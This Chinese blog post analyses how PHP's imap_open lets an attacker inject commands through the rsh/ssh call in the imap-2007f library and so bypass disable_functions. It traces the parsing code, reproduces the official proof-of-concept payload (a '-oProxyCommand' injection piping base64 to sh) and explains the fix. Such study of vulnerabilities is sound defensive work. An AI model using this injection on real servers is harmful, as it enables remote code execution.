溯源imap_open 是如何绕过disable_function

不畏将来,不念过往。如此,安好!

Someone famous 丰子恺

0x00 为什么要写这篇文章


在最近遇见的CTF题中有很多都禁了所有有关命令执行的函数一类的题,如何绕过disable_function执行命令确实是一个问题,对于想要绕过disable_function的方法,有下面几种:

  • 利用环境变量LD_PRELOAD
  • ImageMagick
  • mail函数
  • imagecreatefromgd2
  • 破壳bash漏洞
  • imap_open

最新的方法肯定是imap_open,于是找来几篇imap_open关于绕过disable_function的文章来研究一下,最近也有类似用到imap的CTF题。看了2篇外文,2篇中文。在知道基本的原理的基础上,发现都讲的差不错,然而有些细节方面都没有我想要的,甚至某些地方有一些出入。我想要知道为什么imap会走到ssh上,我注意到在php 函数 imap_open的第一个$mailbox参数中多了一个 },没有它似乎也没有外部的execve调用,我也想知道内部是如何分隔$mailbox参数的,带着这样的疑问,便有了此文,把php 内核调用imap-2007fmail_open过程看了一边,终于理顺了。纸上得来终觉浅!


0x01 imap_open 整个调用链的分析


    0x00   PHP调用mail_open的过程


php 内部并没有自己实现imap过程,用的是c下imap-2007f的库。

0x1 PHP_FUNCTION(imap_open)  ->  php_imap_do_open() -> mail_open();

这是PHP 内的调用过程,全程没有对其第一个参数$mailbox进行处理,传给了mail_open()

imap_stream = mail_open(NIL, ZSTR_VAL(mailbox), flags);

 

  0x01  imap-2007f下mail_open执行过程


进入imap-2007f的库函数下

mail_open()  imap-2007f/src/c-client/mail.c 1186中

name$mailbox

switch (name[0]) {		
case '#': ...
default:
d = mail_valid (NIL,name,(options & OP_SILENT) ?
(char *) NIL : "open mailbox");
}


进入 switch 如果mailbox 开头是#,会进行特别的处理,类似于hook预处理。

或者进入default 这是我们要进的位置。


   0x02  驱动选择过程


-> mail_valid() imap-2007f/src/c-client/mail.c 1257行

选择要使用的邮件驱动 包括 imapdriverpop3drivernntpdriverdummydriver 

首先会有一个基础的判断mailbox不允许带 \n\r,前面会通过mail_link() 将这些驱动注册到全局变量factory

for (factory = maildrivers; factory && 
((factory->flags & DR_DISABLE) ||
((factory->flags & DR_LOCAL) && (*mailbox == '{')) ||
!(*factory->valid) (mailbox));
factory = factory->next);

通过遍历factory,由各个驱动的valid 函数来进行决定用哪个驱动。最后返回选择好的驱动。比如imap_vaild()  都会通过 mail_vaild_net_parse() 分割mailbox 通过得到的 service 和 驱动的名字比较。若相符则正常返回。这个函数是重点后面详细讲,返回选择好的驱动返回,接着走。


d ? mail_open_work (d,stream,name,options) : stream;


-> mail_open_work( ) imap-2007f/src/c-client/mail.c 1260行

选择好驱动以后,进入mail_open_work(), 因为传入streamnil,需要初始化一个新的stream 结构,然后调用相应mail驱动的open() 函数,这里是imap_open()

return ((*d->open)(stream)) ? stream : mail_close(stream);

 

   0x03  imap_open 执行过程


-> imap_open()  imap-2007f/src/c-client/imap4r1.c 783行

这里首先会进入 mail_valid_net_parse() 这个刚才函数,这里是为了将$mailbox分割出一个NETMBX 结构

typedef struct net_mailbox {
char host[NETMAXHOST]; /* host name (may be canonicalized) */
char orighost[NETMAXHOST]; /* host name before canonicalization */
char user[NETMAXUSER]; /* user name */
char authuser[NETMAXUSER]; /* authentication user name */
char mailbox[NETMAXMBX]; /* mailbox name */
char service[NETMAXSRV]; /* service name */
unsigned long port; /* TCP port number */
unsigned int anoflag : 1; /* anonymous */
unsigned int dbgflag : 1; /* debug flag */
unsigned int secflag : 1; /* secure flag */
unsigned int sslflag : 1; /* SSL driver flag */
unsigned int trysslflag : 1; /* try SSL driver first flag */
unsigned int novalidate : 1; /* don't validate certificates */
unsigned int tlsflag : 1; /* TLS flag */
unsigned int notlsflag : 1; /* do not do TLS flag */
unsigned int readonlyflag : 1;/* want readonly */
unsigned int norsh : 1; /* don't use rsh/ssh */
unsigned int loser : 1; /* server is a loser */
unsigned int tlssslv23 : 1; /* force SSLv23 client method over TLS */
} NETMBX;

其中包括后面需要用到的各种参数。也是后面判断进入各种流程的重要依据.

-> mail_valid_net_parse()  -> mail_valid_net_parse_work()  imap-2007f/src/c-client/mail.c  734行

if (*name++ != '{') return NIL;
if (*name == '[') { /* if domain literal, find its ending */
if (!((v = strpbrk (name,"]}")) && (*v++ == ']'))) return NIL;
}
/* find end of host name */
else if (!(v = strpbrk (name,"/:}"))) return NIL;
/* validate length, find mailbox part */
if (!((i = v - name) && (i < NETMAXHOST) && (t = strchr (v,'}')) &&
((j = t - v) < MAILTMPLEN) && (strlen (t+1) < (size_t) NETMAXMBX)))
return NIL; /* invalid mailbox */
strncpy (mb->host,name,i); /* set host name */
strncpy (mb->orighost,name,i);
mb->host[i] = mb->orighost[i] = '\0';
strcpy (mb->mailbox,t+1)

重点看host ,前面都是基础的判断条件,去掉了[] 包裹的内容。 

“/:}”中第一个出现的字符标志为hostname的结束符, 却最后又以} 判断 server 部分的结束,}之后判定为邮箱的名字。当出现一种情况}同时是hostname的结束符,也是整个server部分的结束符。当出现这种下,中间存在目标邮箱地址的端口号和指定的flag都会被略过,会出现下面if判断条件不成立。

if (t - v)  // t-v == 0

图1

图二

如图1和图2,因为不会进入接下的if语句,就不会进行目标邮箱server的端口赋值即mb->port和各种/flag的判断和对mb的赋值 。即使原来的mailbox里flag参数中存在 /norsh  也不会起作用。这个分割函数其实很有意思,因为没有进入if语句 也没有得到相应的service 参数来选择对应的驱动,但是会自动赋值为调用者的service名字,前面说了各个mail驱动的vaild的函数会选择是否适用于当前mailbox,都会默认传递自己的service的名字,可以说4个驱动在这种情况都是可以用的,但是很巧的是 imapdriver是第一个注册的。所以理所当然的走到了imap下。

if (!*mb->service) strcpy (mb->service,service);


 回到 ->imap_open 

经过分割得到的mb 参数。因为没有进入if语句会丢失很多赋值过程

if (mb.dbgflag) stream->debug = T;
if (mb.readonlyflag) stream->rdonly = T;
if (mb.anoflag) stream->anonymous = T;
if (mb.secflag) stream->secure = T;
if (mb.trysslflag || imap_tryssl) stream->tryssl = T;

列如这些都不会进如 if,因为/flag 都没有判断。

if (stream->anonymous || mb.port || mb.sslflag || mb.tlsflag)
reply = (LOCAL->netstream = net_open (&mb,NIL,defprt,ssld,"*imaps",
sslport)) ?
imap_reply (stream,NIL) : NIL;

相应的 stream->anonymous mb.port  mb.sslflag mb.tlsflag都是NIL

else if (reply = imap_rimap (stream,"*imap",&mb,usr,tmp));


  0x04  imap_rimap 执行过程


进入 imap_rimap   imap-2007f/src/c-client/imap4r1.c 1022行

if (!mb->norsh && (tstream = net_aopen (NIL,mb,service,usr)))

-> net_aopen() /root/bypass_disable_function/imap-2007f/src/c-client/mail.c  6218行

if (!dv) dv = &tcpdriver;

if (tstream = (*dv->aopen) (mb,service,user))

-> tcp_aopen(unix)  imap-2007f/src/osdep/unix/tcp_unix.c imap-2007f/src/osdep/unix/tcp_unix.c 330行

#ifdef SSHPATH			/* ssh path defined yet? */
if (!sshpath) sshpath = cpystr (SSHPATH);
#endif
#ifdef RSHPATH /* rsh path defined yet? */
if (!rshpath) rshpath = cpystr (RSHPATH);
#endif
if (*service == '*') { /* want ssh? */
/* return immediately if ssh disabled */
if (!(sshpath && (ti = sshtimeout))) return NIL;
/* ssh command prototype defined yet? */
if (!sshcommand) sshcommand = cpystr ("%s %s -l %s exec /etc/r%sd");
}
/* want rsh? */
else if (rshpath && (ti = rshtimeout)) {
/* rsh command prototype defined yet? */
if (!rshcommand) rshcommand = cpystr ("%s %s -l %s exec /etc/r%sd");
}
else return NIL;

 关于rsh的寻址问题其他文章也讲的很清楚了。SSHPATH 和RSHPATH都先从/etc/c-client.cf 的配置文件得到,一般都是为空,但RSHPATH 在编译的时候可以从makefile里面可以被指定为 /usr/bin/rsh,在debian rsh 又是指向 ssh。(如图3)

图三

else if (rshpath && (ti = rshtimeout)) {
/* rsh command prototype defined yet? */
if (!rshcommand) rshcommand = cpystr ("%s %s -l %s exec /etc/r%sd");
}

rshcommand 是默认nil,这里赋值。

else sprintf (tmp,rshcommand,rshpath,host,mb->user[0] ? mb->user : myusername (),service);

写入tmp里面,rshpath/usr/bin/rshhostmb->host 经过tcp_canonical 并通过dns解析,返回原值。user 为 myusername() 调用者是谁,我这里是root ,service 即“imap”

tmp 应为 “rshpath mb->host -l myusername() exec /usr/sbin/rimapd”

for (i = 1,path = argv[0] = strtok_r (tmp," ",&r);
(i < MAXARGV) && (argv[i] = strtok_r (NIL," ",&r)); i++);
argv[i] = NIL;

这个地方也很关键,是分割path args 的位置,这里也有跟国内的两篇的文章有出入,并不是他们说的不能用$mailbox 包含空格 ,因为会被转义,?????,这是转义吗?这是以空格为标志分割命令执行的参数。所以这里不能用空格 可以用 \t $IFS来代替,

其最后execv (path,argv)

execv("/usr/bin/rsh",["/usr/bin/rsh",host ...]

这里已经可以通过修改hostname达到参数注入,同样ssh 也有那么一个参数可以执行任意命令 -oProxyCommand,避免不要的麻烦,可以base64,因为涉及到getshell  可能会出现写路径出现 / ,因为前面说了 / 同样是可以判定hostname的结束符,这样把}提前就没有意义了。下面的strace 结果可能会看的更清楚

图四

0x02 Payload && 官方修复分析


附上官方验证性payload ,至于修复php官方 默认将rsh和ssh 的连接超时设置为了0

STD_PHP_INI_BOOLEAN("imap.enable_insecure_rsh", "0", PHP_INI_SYSTEM, OnUpdateBool, enable_rsh, zend_imap_globals, imap_globals)

...

if (!IMAPG(enable_rsh)) {
/* disable SSH and RSH, see https://bugs.php.net/bug.php?id=77153 */
mail_parameters (NIL, SET_RSHTIMEOUT, 0);
mail_parameters (NIL, SET_SSHTIMEOUT, 0);
}

rshtimeoutsshtimeout 同样也可以来源于 /etc/c-client.cf ,一般情况这个文件是空的,同样在tcp_unxi.c 中也对这个两个值进行了赋值,默认都为15.

在  tcp_aopen()  imap-2007f/src/osdep/unix/tcp.unix.c  349

else if (rshpath && (ti = rshtimeout)) return NIL

这样一来就给限制住了,直接返回nil. 下面是官方测试用的payload

$payload = "echo 'BUG'> " . __DIR__ . '/__bug';
$payloadb64 = base64_encode($payload);
$server = "x -oProxyCommand=echo\t$payloadb64|base64\t-d|sh}";


0x03 对其整个过程的思考和总结


在php 使用 imap_open的时候一定需要注意 :第一个参数$mailbox php本身并没有对其进行检验是否符合格式的操作。只是判断了第一个字符是不是,在c的imap-2007f库中虽然进行了参数化,但在处理上还是有一定的问题。

比如在最后 tcp_aopen()  imap-2007f/src/osdep/unix/tcp.unix.c  371

strcpy(host,tcp_canonical(mb->host)) 

tcp_canonical 仅仅对hostname 进行了 ip_nametoadress 其本身就是调用了gethostname,若解析不了则原hostname 返回,这过程是不是存在一点问题?

所以在使用imap_open 中对hostname 一定要严格限定,应过滤相应的 ”/ ” “}“ 这些字符。

在选择外部调用的问题上,是否应该完全交付处理,这问题出在信任链上。


0x04 整个过程的调用链

图五


0x05 参考连接

https://lab.wallarm.com/rce-in-php-or-how-to-bypass-disable-functions-in-php-installations-6ccdbf4f52bb

https://nosec.org/home/detail/2044.html

https://xz.aliyun.com/t/4113

https://github.com/asmlib/imap-2007f